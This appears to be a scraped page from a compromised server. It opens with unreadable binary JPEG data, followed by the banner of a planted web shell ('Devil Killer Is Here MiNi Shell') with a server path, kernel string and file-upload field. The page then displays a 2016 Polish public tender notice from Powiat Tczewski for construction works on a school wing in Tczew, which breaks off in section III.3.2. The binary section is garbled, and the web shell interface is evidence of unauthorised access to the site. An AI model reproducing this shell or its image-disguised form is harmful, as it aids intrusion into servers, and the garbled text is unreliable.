JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160517/124616-N-2016.html

<p class="kh_header"><b>Tczew: WYKONANIE ROBÓT BUDOWLANYCH ZWIĄZANYCH Z REALIZACJĄ 
ZADANIA INWESTYCYJNEGO PN. ADAPTACJA I ROZBUDOWA SKRZYDŁA Z.S.Z. NA POTRZEBY O.R.W.</b><br>
<b>Numer ogłoszenia: 124616 - 2016; data zamieszczenia: 17.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Tczewski , ul. Piaskowa 2, 83-110 Tczew, woj. pomorskie, tel. 58 7734 800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> powiat.tczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ROBÓT BUDOWLANYCH ZWIĄZANYCH Z REALIZACJĄ 
ZADANIA INWESTYCYJNEGO PN. ADAPTACJA I ROZBUDOWA SKRZYDŁA Z.S.Z. NA POTRZEBY O.R.W..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1	Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie branż: konstrukcyjno-budowlanej, sanitarnej i elektrycznej, związanych z realizacją zadania inwestycyjnego pn. Adaptacja i rozbudowa skrzydła ZSZ na potrzeby ORW.
2.2	Adres obiektu, w którym prowadzone będą roboty budowlane: Zespół Placówek Specjalnych w Tczewie przy ul. Grunwaldzkiej 1.
W strukturze organizacyjnej ww. placówki  znajdują się oddziały, których dotyczy opis przedmiotu zamówienia niniejszego postępowania przetargowego, a mianowicie (w ramach Specjalnego Ośrodka Szkolno-Wychowawczego) Zespół Szkół Zawodowych (zwany dalej ZSZ), a także Ośrodek Rewalidacyjno-Wychowawczy (zwany dalej ORW).
2.3	Szczegółowy zakres robót objętych niniejszym postępowaniem określają dwie dokumentacje projektowe autorstwa APA PROJEKT Pracownia Architektoniczna (ul. Sportowa 2-2, 83-110 Tczew), stanowiące Załącznik Nr 4 do SIWZ - Dokumentacja dotycząca przedmiotu zamówienia, składające się z następujących pozycji:
2.3.1	dokumentacja pn. Przebudowa budynku oświaty, Adaptacja pomieszczeń dla potrzeb ORW, obejmująca:
1.	Projekt architektoniczno-budowlany wraz z projektem zagospodarowania terenu,
2.	Projekt budowlany konstrukcyjny,
3.	Projekt budowlany instalacji elektrycznych,
4.	Projekt budowlany wewnętrznych instalacji sanitarnych,
5.	Specyfikacja techniczna wykonania i odbioru robót budowlanych,
6.	Przedmiar robót;
2.3.2	dokumentacja pn. Przebudowa i rozbudowa budynku oświaty, Adaptacja pomieszczeń dla potrzeb ORW Ośrodka Rehabilitacyjno-Wychowawczego, obejmująca (z wyłączeniem robót budowlanych związanych z wykonaniem zadaszenia dziedzińca):
1.	Projekt architektoniczno-budowlany wraz z projektem zagospodarowania terenu,
2.	Projekt budowlany konstrukcyjny,
3.	Projekt budowlany instalacji elektrycznych,
4.	Projekt budowlany wewnętrznych instalacji sanitarnych,
5.	Specyfikacja techniczna wykonania i odbioru robót budowlanych,
6.	Przedmiar robót.
2.4	Przedmiot zamówienia obejmuje wykonanie następujących robót budowlanych w poszczególnych zakresach:
2.4.1	Zakres 1 - roboty budowlane na podstawie projektu budowlanego o którym mowa w pkt 2.3.1 SIWZ: - skucie posadzek o gr. 1-3 cm celem wykonania nowych okładzin posadzek we wszystkich pomieszczeniach objętych projektem, z wyjątkiem posadzki wykonanej z płytek gresowych bądź wykładziny dywanowej w płytkach, - wzniesienie ścianek działowych z pustaków ceramicznych i płyt gips-kart na konstrukcji z profili aluminiowych wraz z wypełnieniem z wełny mineralnej, - wymiana istniejących drzwi wraz z ościeżnicami oraz montaż nowych drzwi w projektowanych otworach drzwiowych, - montaż drzwi przesuwnych z kasetami ościeży wraz z mechanizmem elektrycznego wspomagania otwierania drzwi przesuwnych, - prace wykończeniowe - szpachlowanie, cekolowanie, malowanie ścian, kafelkowanie w pomieszczeniach higieniczno-sanitarnych do poziomu 2m od posadzki, kafelkowanie posadzek, montaż niepalnych wykładzin filcowych na ścianach w salach dydaktycznych do poziomu 1m od posadzki, wykończenie sufitów, - montaż poręczy asekuracyjnych w łazienkach - pochwyty systemowe z rur stalowych nierdzewnych szlifowanych (matowych), - pełne wyposażenie łazienek i toalet dla osób niepełnosprawnych (z wyłączeniem kozetki lekarskiej w pomieszczeniu nr 10 - łazienka), - montaż kominów wentylacji grawitacyjnej nad pomieszczeniami łazienek (4 szt.) oraz w trzech nowych salach dydaktycznych (3 szt.), - montaż wentylatorów wywiewnych zintegrowanych z włącznikiem światła w pomieszczeniach dwóch łazienek, - wykonanie instalacji elektrycznej (odbiorczej, oświetleniowej i gniazd wtykowych), - wykonanie wewnętrznej instalacji sanitarnej (wody zimnej-ciepłej, kanalizacji sanitarnej, centralnego ogrzewania);
2.4.2	Zakres 2 - roboty budowlane na podstawie projektu budowlanego o którym mowa w pkt 2.3.1 SIWZ, w pozostałym zakresie niewymienionym w pkt 2.4.1 SIWZ, m.in.: - prace rozbiórkowe i demontażowe ścianek działowych, - prace rozbiórkowe związane z wykonaniem nadproży stalowo-ceramicznych nowych otworów drzwiowych i okiennych, - wymiana i montaż nowych okien i drzwi zewnętrznych z 2 sal dydaktycznych oraz 1 szt. z korytarza w miejscu istniejącego otworu okiennego do przystosowania pod wymiar otworu drzwiowego, - wyposażenie łazienki w kozetkę lekarską (1szt.);
2.4.3	Zakres 3 - roboty budowlane na podstawie projektu budowlanego, o którym mowa w pkt 2.3.2 SIWZ, m.in.:
(UWAGA!!! Przedmiot zamówienia w niniejszym zakresie nie obejmuje robót budowlanych związanych z zadaszeniem dziedzińca. Wymienionych robót nie należy uwzględniać w ofercie.) - prace rozbiórkowe posadzki z kostki betonowej dziedzińca istniejącego w miejscu planowanej rozbudowy, - prace rozbiórkowe związane z wykonaniem nadproży stalowo-ceramicznych nowych otworów drzwiowych i okiennych, - demontaż i zamurowania istniejących okien, - budowa ścian murowanych na nowym fundamencie żelbetowym, - wykonanie konstrukcji monolitycznej żelbetowej słupów i podciągów wraz z wieńcem okalającym dobudowaną części budynku - wykonanie stropodachu nad dobudowanymi pomieszczeniami, - termomodernizacja, remont połaci dachowych wraz ze zmianą spadków, wymianą i instalacją nowych rynien i rur spustowych, - wykonanie izolacji przeciwwodnych i termoizolacji pionowych ścian fundamentowych budynku istniejącego podlegającego przebudowie i adaptacji, nowoprojektowanej dobudowie oraz ścian budynku istniejącego wokół dziedzińca wewnętrznego przeznaczonego do zadaszenia, - montaż okien i drzwi wewnętrznych w części dobudowanej obiektu, - prace wykończeniowe,  - montaż kominów wentylacji grawitacyjnej nad pomieszczeniami w 3 nowych salach dydaktycznych w części dobudowanej, - wykonanie instalacji elektrycznych (odbiorczej, oświetleniowej i gniazd wtykowych), - wykonanie instalacji wod.-kan. (wody zimnej-ciepłej, kanalizacji sanitarnej, centralnego ogrzewania). UWAGI:
1)	Pod skuwaną posadzką korytarza znajdują się kanały technologiczne.
2)	W części objętej opracowaniem znajduje się sprawna instalacja alarmowa - monitoring oraz sprawna instalacja teletechniczna. 
Wykonawca zobowiązany jest do ich demontażu i ponownego montażu ww. instalacji na własny koszt z zastrzeżeniem, że instalacja te musza pozostać sprawne.
3)	Stolarka okienna i drzwiowa z demontażu pozostaje do dyspozycji zarządcy budynku. Stolarkę należy zdemontować i zeskładować w miejscu wyznaczonym przez zarządcę budynku.
4)	Kostka z demontażu pod rozbudowywaną częścią budynku pozostaje do dyspozycji zarządcy budynku. Kostkę należy zdemontować i zeskładować w miejscu wyznaczonym przez zarządcę budynku.
5)	Rynny i rury spustowe z demontażu pozostają do dyspozycji zarządcy budynku. Rynny i rury spustowe zdemontować i zeskładować w miejscu wyznaczonym przez zarządcę budynku.
2.5	Podstawowe parametry-dane robót budowlanych:
1)	Powierzchnia zabudowy przed przebudową i rozbudową: 254,86 m2,
2)	Powierzchnia zabudowy po przebudowie i rozbudowie: 313,01 m2,
3)	Powierzchnia użytkowa przed przebudową i rozbudową: 199,61 m2,
4)	Powierzchnia użytkowa po przebudowie i rozbudowie: 245,27 m2.
2.6	W celu uniknięcia niesłusznych roszczeń odszkodowawczych ze strony właścicieli istniejących nieruchomości, przed przystąpieniem do realizacji robót budowlanych, Wykonawca zobowiązany będzie do wykonania dokumentacji fotograficznej budynków znajdujących się w bezpośrednim sąsiedztwie inwestycji.
2.7	W związku z przyjętym rozliczeniem ryczałtowym, Zamawiający informuje, że wszystkie przedmiary robót udostępnione wraz z dokumentacją projektową należy traktować w sposób orientacyjny i pomocniczy. Stanowią one część składową opisu przedmiotu zamówienia i nie mogą być dla Wykonawcy jedyną podstawą do obliczenia ceny oferty. 
2.8	Zadaniem Wykonawcy będzie wykonanie pełnego zakresu robót budowlanych zawartych we wszystkich projektach, zarówno przedstawionych w formie rysunków, jak i w części opisowej. Należy to rozumieć w taki sposób, że jeśli nawet jakaś uwaga zawierająca polecenie wykonania określonego zakresu robót budowlanych została zapisana w części opisowej projektu, a nie ma odzwierciedlenia na rysunku bądź w przedmiarze robót - to obowiązkiem Wykonawcy będzie jej wykonanie, z zastrzeżeniem uwagi z pkt 2.4.3 o nie wykonywaniu robót z związanych z zadaszeniem dziedzińca.
2.9	W celu złożenia prawidłowej oferty, Wykonawca  powinien uwzględnić dane zawarte                           w SIWZ w poszczególnych dokumentacjach, kolejno według stopnia ważności: projekty budowlane, STWiORB oraz pozostałe.
2.10	W związku z art. 30 ust. 4 i 5 Ustawy i faktem, iż Zamawiający dokonał opisu przedmiotu zamówienia m.in. poprzez wymaganą przepisami STWiORB, Zamawiający dopuszcza zastosowanie rozwiązań równoważnych w stosunku do opisywanych. Wykonawca natomiast zobowiązany jest do zastosowania rozwiązań równoważnych co do ich cech i parametrów, przy czym rozwiązania te muszą oznaczać stosowanie rozwiązań nie gorszych niż rozwiązania, które są opisane przez Zamawiającego.
Zastosowanie rozwiązań równoważnych musi gwarantować zaprojektowane konkretne rozwiązania projektowe, które projekt realizuje, a ich zastosowanie musi zapewnić kompatybilność z zastosowanymi urządzeniami, wyrobami i technologią.
2.11	Wykonawca powiadomi na piśmie Nadzór Inwestorski i Zamawiającego o wszelkich zauważonych błędach lub nieścisłościach na rysunkach i specyfikacjach oraz o konieczności opracowania dodatkowych rysunków i specyfikacji niezbędnych do realizacji zamówienia.
2.12	Do powinności Wykonawcy, należeć ponadto będzie:
1)	wykonanie wszystkich robót towarzyszących, wynikających z technologii robót;
2)	zabezpieczenie placu budowy w sposób trwały i wyraźny przed osobami trzecimi także w czasie przerw technologicznych, ustalenie stałego nadzoru osobowego w miejscach zagrożenia wypadkiem osób przypadkowych;
3)	zabezpieczenie i oznakowanie własnym kosztem i staraniem placu budowy;
4)	wykonanie pomiarów wykonawczych i powykonawczych, wymaganych odpowiednimi przepisami oraz wykonanie geodezyjnej mapy powykonawczej;
5)	zapewnienie na własny koszt dostawy energii elektrycznej i wody;
6)	doprowadzenie pomieszczeń/terenów udostępnionych na czas prowadzenia robót budowlanych przez użytkowników tych pomieszczeń/terenów do stanu w jakim je przejmował;
7)	wykonywanie niezbędnych badań w celu udokumentowania odpowiedniej jakości i parametrów wykonania prac.  
2.13	Zaleca się dokonanie wizji lokalnej w miejscu planowanych robót budowlanych dla prawidłowego przygotowania oferty i realizacji zamówienia.
2.14	Warunki prowadzenia robót:
1)	Wymagania   dotyczące   zasad   prowadzenia   robót  i  realizacji  budowy  podają            specyfikacje  techniczne  wykonania  i  odbioru  robót  budowlanych.
2)	Wykonawca musi posiadać lub dysponować miejscem z pozwoleniem na utylizację materiałów rozbiórkowych.
3)	Zamówienie będzie realizowane zgodnie z harmonogramem rzeczowo- finansowym robót, sporządzonym przez  Wykonawcę i przedłożonym do akceptacji Nadzorowi Inwestorskiemu i przedstawicielom Zamawiającego.
4)	Wykonawca jest zobowiązany do właściwego i zgodnego z przepisami BHP zabezpieczenia terenu budowy oraz zastosowania się do wszelkich norm bezpieczeństwa w zakresie prowadzonych robót.  
2.15	Zamawiający zastrzega sobie prawo dysponowania nieruchomością, na której prowadzone będą roboty budowlane w uzgodnieniu z Wykonawcą.
2.16	Przed podpisaniem umowy wybrany Wykonawca przedłoży Zamawiającemu kosztorys rozliczeniowy, celem jego zatwierdzenia przez Nadzór Inwestorski, który zostanie przez Zamawiającego wyłoniony w drodze odrębnego postępowania przetargowego.
Niniejszy kosztorys będzie używany w celach rozliczeniowych w przypadkach:
a)	odstąpienia od umowy,
b)	konieczności zaniechania realizacji części robót objętych zamówieniem,
c)	konieczności zastosowania robót zamiennych,
d)	sprawdzenia wysokości wynagrodzenia za wykonanie zakresu prac w ramach podwykonawstwa.
UWAGI:
1)	Kosztorys musi rozgraniczać zakres prac wykonywanych przez podwykonawców lub dalszych podwykonawców.
2)	Kosztorys rozliczeniowy powinien być podzielony na 3 części, zgodnie z podziałem na zakresy robót budowlanych opisanych odpowiednio w pkt SIWZ: 2.4.1, 2.4.2 i 2.4.3 SIWZ, a także powinien uwzględniać szczegółowo wszystkie prace związane z wykonaniem zamówienia. 
3)	Zgodnie z obowiązującymi przepisami prawa kosztorys ma zawierać stronę tytułową z podpisem sporządzającego, książkę przedmiarów, ceny jednostkowe, tabelę elementów scalonych oraz w załączniku - dla analiz indywidualnych i analogii - kalkulację szczegółową cen jednostkowych wraz z uzasadnieniem. 
4)	Cena wynikająca z kosztorysu rozliczeniowego, musi być tożsama z ryczałtową ceną ofertową podaną w Załączniku Nr 1 do SIWZ - Formularz ofertowy.
2.17	INFORMACJA O GWARANCJACH:
2.17.1	Wykonawca musi w swojej ofercie zadeklarować długości okresów gwarancji jakości i rękojmi za wady - w miesiącach, licząc od daty podpisania przez strony bezusterkowego protokołu odbioru końcowego robót, przy czym oba ww. okresy nie mogą być krótsze niż 60 m-cy. 
Zamawiający podkreśla, iż długości zdefiniowanych okresów gwarancji nie należy rozumieć jako sumy m-cy dla dwóch różnych okresów gwarancyjnych, a ponadto długość ta winna być identyczna dla obu rodzajów okresu. To oznacza, że Wykonawca w ofercie winien zaoferować okres gwarancji, który wyniesie - minimum - 60 m-cy na gwarancję jakości i 60 m-cy na rękojmię za wady.
2.17.2	Z uwagi na fakt, iż długość okresu gwarancji - oprócz ceny za wykonanie przedmiotu zamówienia - stanowi kryterium wyboru Wykonawcy (szczegóły dotyczące wagi poszczególnych kryteriów oceny ofert zawiera Rozdział 13 SIWZ), zadeklarowanie okresów gwarancji jakości i rękojmi za wady wynoszących 60 m-cy będzie równoznaczne z przyznaniem 0 pkt w ramach przedmiotowego kryterium. Nie wskazanie wymaganego okresu w ogóle, będzie przez Zamawiającego przyjmowane tak, jakby Wykonawca zaoferował minimalny to jest 60 m-czny okres gwarancji, a zatem również zostanie mu przyznane 0 pkt.
UWAGA: Zadeklarowanie okresu krótszego niż 60 m-cy będzie skutkować odrzuceniem oferty w trybie art. 89 ust. 1 pkt 2 Ustawy, to jest z uwagi na jej niezgodność z treścią SIWZ.
2.17.3	W celu uniknięcia stosowania przez Wykonawców nieuzasadnionego podwyższania wartości ceny jako głównego kryterium wyboru oferty, z równoczesnym nadmiernym (lub wręcz abstrakcyjnym) wydłużaniem zadeklarowanej długości okresu gwarancji, Zamawiający określa maksymalną długość dodatkowego okresu gwarancji (ponad obligatoryjne 60 m-cy) - jako 180 m-cy. Każde zadeklarowanie okresu gwarancji ponad 180 m-cy, będzie przez Zamawiającego przyjmowane do obliczeń punktów tak, jakby Wykonawca zadeklarował 180 m-cy. 
2.18	INFORMACJA O UBEZPIECZENIU O.C.: 
Wybrany Wykonawca, przez cały okres trwania umowy, zobowiązany będzie do posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej w ramach prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, w wysokości co najmniej 300 000,00 PLN (słownie: trzysta tysięcy złotych 00-100).
2.19	INFORMACJA O PODWYKONAWCACH:
2.19.1	Zamawiający nie dokonuje zastrzeżenia dotyczącego obowiązku osobistego wykonania kluczowych części zamówienia przez Wykonawcę.
2.19.2	W przypadku zatrudnienia podwykonawców, Wykonawca będzie ponosić pełną odpowiedzialność wobec Zamawiającego i osób trzecich za działania i zaniechania podwykonawców, jak również za jakość wykonanych przez nich robót.
2.19.3	Zamawiający wymaga od Wykonawcy wskazania w ofercie (sporządzonej według wzoru stanowiącego Załącznik Nr 1 do SIWZ - Formularz ofertowy) części zamówienia, które zamierza powierzyć podwykonawcy.
2.19.4	Jeżeli zmiana lub rezygnacja z podwykonawcy będzie dotyczyć podmiotu, na którego zasoby Wykonawca powołał się na zasadach określonych w art. 26 ust. 2b Ustawy w celu spełnienia warunków udziału w postępowaniu określonych w SIWZ, Wykonawca będzie zobowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
2.19.5	Zamawiający w projekcie umowy (stanowiącym Załącznik Nr 3 do SIWZ - Istotne postanowienia umowy) określił wymagania dotyczące umowy o podwykonawstwo, której przedmiotem są roboty budowlane, nie spełnienie których spowoduje zgłoszenie odpowiednio zastrzeżeń lub sprzeciwu.
2.19.6	Zamawiający w projekcie umowy (stanowiącym Załącznik Nr 3 do SIWZ - Istotne postanowienia umowy) określił wymagania dotyczące umowy o podwykonawstwo, której przedmiotem są dostawy lub usługi, podlegające obowiązkowi informowania Zamawiającego.
2.20	Zamawiający informuje, że do rozliczenia końcowego Wykonawca zobowiązany będzie załączyć kosztorysy powykonawcze sporządzone metodą kalkulacji uproszczonej, zgodnie z obowiązującymi zasadami kosztorysowania, zaakceptowane przez inspektora nadzoru, jeżeli był ustanowiony lub Wnioskodawcę z zapisem Określony w kosztorysie zakres prac został wykonany (wymóg instytucji dofinansowującej zadanie - PFRON).
2.21	Zamawiający informuje, iż z uwagi na konieczność finansowego rozliczenia przedmiotu zamówienia w zależności od poszczególnych zakresów robót budowlanych wyszczególnionych w pkt 2.4 SIWZ w ramach zadania inwestycyjnego pn. Adaptacja i rozbudowa skrzydła ZSZ na potrzeby ORW, zaoferowana przez Wykonawcę cena za całkowite wykonanie przedmiotu zamówienia (która zostanie podana w Załączniku Nr 1 do SIWZ - Formularz ofertowy), winna być sumą trzech kwot za wyszczególnione zakresy robót; według wzoru stanowiącego Załącznik Nr 2 do SIWZ - Formularz cenowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających w trybie art. 67 ust. 1 pkt 6 ustawy Pzp, do wysokości 50% wartości zamówienia podstawowego w branżach: konstrukcyjno-budowlanej, sanitarnej i elektrycznej</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 45.33.10.00-6, 45.33.20.00-3, 45.42.10.00-4, 45.44.30.00-3, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1	Warunkiem udziału w postępowaniu jest wniesienie wadium. Zamawiający określa wadium na kwotę: 10 000,00 PLN (słownie złotych: dziesięć tysięcy 100/00).
8.2	Wadium musi być wniesione przed upływem terminu do składania ofert, wskazanego w punkcie 11.1 SIWZ.
8.3	Wadium może być wnoszone w następujących formach: 
8.3.1 pieniądzu, 
8.3.2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
8.3.3 gwarancjach bankowych, 
8.3.4 gwarancjach ubezpieczeniowych,
8.3.5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r., poz. 1804 ze zm.).
8.4  Jeżeli wadium zostanie wniesione w pieniądzu to należy je wpłacić przelewem na rachunek bankowy Zamawiającego: Getin Noble Bank S.A.: 06 1560 0013 2226 4983 1000 0003. Wykonawca powinien dołączyć do oferty kserokopię wniesienia wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: Wadium - przetarg nr ZP.272.9.2016. W pozostałych przypadkach wymagane jest dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego, który należy złożyć łącznie z ofertą. Dokumenty potwierdzające wniesienie wadium, o których mowa w punkcie 8.3 SIWZ muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
8.5	W przypadku wnoszenia wadium w formie innej niż w pieniądzu, w treści tego dokumentu powinno znaleźć się, co następuje:
1)	treść art. 46 ust. 4a i 5 Ustawy, określająca okoliczności zatrzymania wadium przez Zamawiającego,
2)	jednoznaczny zapis o gwarantowaniu wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie,
3)	gdy oferta zostanie złożona przez podmioty wspólnie ubiegające się o udzielenie zamówienia (np. konsorcjantów) - informacja identyfikująca podmioty, których dotyczy zabezpieczenie wadialne oferty.
Brak którejś z powyższych adnotacji w treści dokumentu wadialnego, będzie skutkować odrzuceniem oferty, w związku z wykluczeniem Wykonawcy w trybie art. 24 ust. 2 pkt 2 Ustawy, to jest z uwagi na nie wniesienie wadium.
8.6	W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego wskazany w punkcie 8.4 SIWZ.
8.7	Okoliczności i zasady zwrotu wadium, jego przepadku określa Ustawa.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
